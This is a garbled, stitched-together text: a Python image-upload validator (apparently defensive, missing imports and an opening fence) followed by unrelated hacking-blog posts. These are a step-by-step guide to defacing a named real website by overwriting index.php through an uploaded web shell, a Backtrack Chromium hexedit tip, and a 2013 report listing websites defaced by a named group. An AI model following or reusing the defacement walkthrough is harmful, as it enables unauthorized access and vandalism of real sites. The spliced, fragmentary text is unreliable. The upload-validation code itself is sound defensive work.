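# Leading bytes ("magic numbers") of the only formats the news-image field accepts.
SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for this example


class UploadRejected(ValueError):
    """Raised when an upload fails a check; the caller should answer with HTTP 4xx."""


def checked_extension(client_name, data):
    """Return the allowlisted extension for this upload, or raise UploadRejected."""
    # Only the final extension of the client-supplied name is considered.
    ext = os.path.splitext(client_name.lower())[1]
    if ext not in SIGNATURES:
        raise UploadRejected("extension %r is not an allowed image type" % ext)
    if len(data) > MAX_BYTES:
        raise UploadRejected("file is larger than %d bytes" % MAX_BYTES)
    if not data.startswith(SIGNATURES[ext]):
        raise UploadRejected("content does not start with a %s signature" % ext)
    return ext


def store_image(upload_dir, client_name, data):
    """Validate, then write under a server-chosen name; returns the stored file name."""
    ext = checked_extension(client_name, data)
    # The client name is discarded, so "x.php.png" can never leave ".php" on disk.
    stored = secrets.token_hex(16) + ext
    path = os.path.join(upload_dir, stored)
    # O_EXCL: never overwrite an existing file; 0o640: not executable.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return stored
```

These checks belong alongside a web-server configuration that never hands files in the upload directory to the PHP interpreter, since a signature check alone does not stop a file that is both a valid image and a script.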
-------------------------------------------------------------------------------------------------
Last step:
Now you are in the shell!
You need to hack this site!
The site's default page is index:
whenever you open a site, like the target site
http://www.area96.it/
it run on http://www.area96.it/index.php
so you will need to change the index.php file.
In the shell you are in the directory where the shell was uploaded!
I uploaded my shell from the image section, so it is in
http://www.area96.it/images/news/
Near the top
you can see this
PWD: /home/area96/area96.it/images/news/ |CURRENT|
which shows your current directory.
You need to edit index.php, which is located in area96.it,
so click on area96.it in the
PWD: /home/area96/area96.it/images/news/ |CURRENT|
line.
It will open the PWD: /home/area96/area96.it/ |CURRENT|
directory!
Now in the center you can see the files located in the folder,
including index.php.
Just rename your deface page to index.php and upload it here!
It will overwrite the file, and when someone opens the site it will show your deface page instead of the site!
The upload button is at the bottom of the shell!
Just upload your index.php to /home/area96/area96.it/ |CURRENT
and the site is hacked!
Now open the website and see whether your name is there or not!
http://www.area96.it/
Hacked BY Str!k3r !
----------------------------------------------------------------------------------------------
NOTE: This post is just to share knowledge and is for educational purposes only. No one will be responsible if you do something stupid and get caught by the cops!
Try at your own risk.
-----------------------------------------------------------------------------------------------
Installing Google Chromium Browser In Backtrack 5
Well friends,
Today we will see how to install the Google Chromium browser in Backtrack 5.
As we know, Google Chrome is one of the best browsers ever made. Google also made a Chrome-like flavour for Linux called the Chromium browser;
it has many features and is the safest browser ever.
Chrome can be installed on Windows without any problem :D but the situation gets worse when a hacker, a pentester or a Linux distro lover tries to install it on Backtrack or other distros.
So let's go step by step through how to install Chromium on a distro, which in my case is Backtrack 5 R3.
So let's do it ;)
1) First of all, open a terminal and download the Google Chromium archive with this command.
root@bt:~# apt-get install chromium-browser
2) After the download completes, you can see Chromium under Application=>Internet=>Chromium Web Browser, so let's open it ^_^
Well, that's the main problem we actually get :D So how do we solve this? It's easy:
open a terminal and type
root@bt:~# cd /usr/lib/chromium-browser
3) Now type
root@bt:/usr/lib/chromium-browser# hexedit chromium-browser
Something like this will pop up in the terminal.
Don't worry, we just need to change the value of a specific id. :D Chromium refuses to start when geteuid reports the root user, which is what Backtrack runs as, so the next step makes the binary call getppid instead.
4) Now the most important step: press the Tab key and then Ctrl+S to enter search mode, type "geteuid", replace it with "getppid" and don't hit Enter -_- Press Ctrl+X; it will prompt you to save the changes, so just press "Y".
Voila! Now open Chromium and check whether it opens or not :D
Enjoy your Chrome browser on Backtrack :D
Don't forget to comment or give us your feedback; if you have any problem regarding the tut, just drop a comment below.
Thank you.
Wednesday, 8 May 2013
India On PCE Mercy.
Recently a Pakistani hackers' team named Pak Cyber Experts attacked Indian websites; the real reasons behind those hacks were given by the attackers.
The attackers, namely x33k A.K.A v1ruX 4u and X3R03x, who attacked the websites, gave the following reason:
MESSAGE :
"=====================================================================
x33k & X3R03X Has Arrived You Just Got Hacked Patch Your Asses, Don't Know How To Secure Shits And Making Sites LOL, Huh ! Now Next Time Keep Eye On Your cPanel | Domain | Your Admin Panel Because We Can Get In Again, Take Care
===================================================================================="
The hacked websites include:
1) http://47webstudio.com/
2) http://www.brandvois.com/
3) http://cheatedon.me/
4) http://www.codyscopywriters.com/
5) http://dvonn.com/
6) http://kindlecrush.com/
7) http://n-frames.com/
8) http://sandeepgr.tk/
9) http://www.thewings.co/
10) http://tonyvarghese.com/
11) http://intire.in/
You can find the mirrors on Hack-db.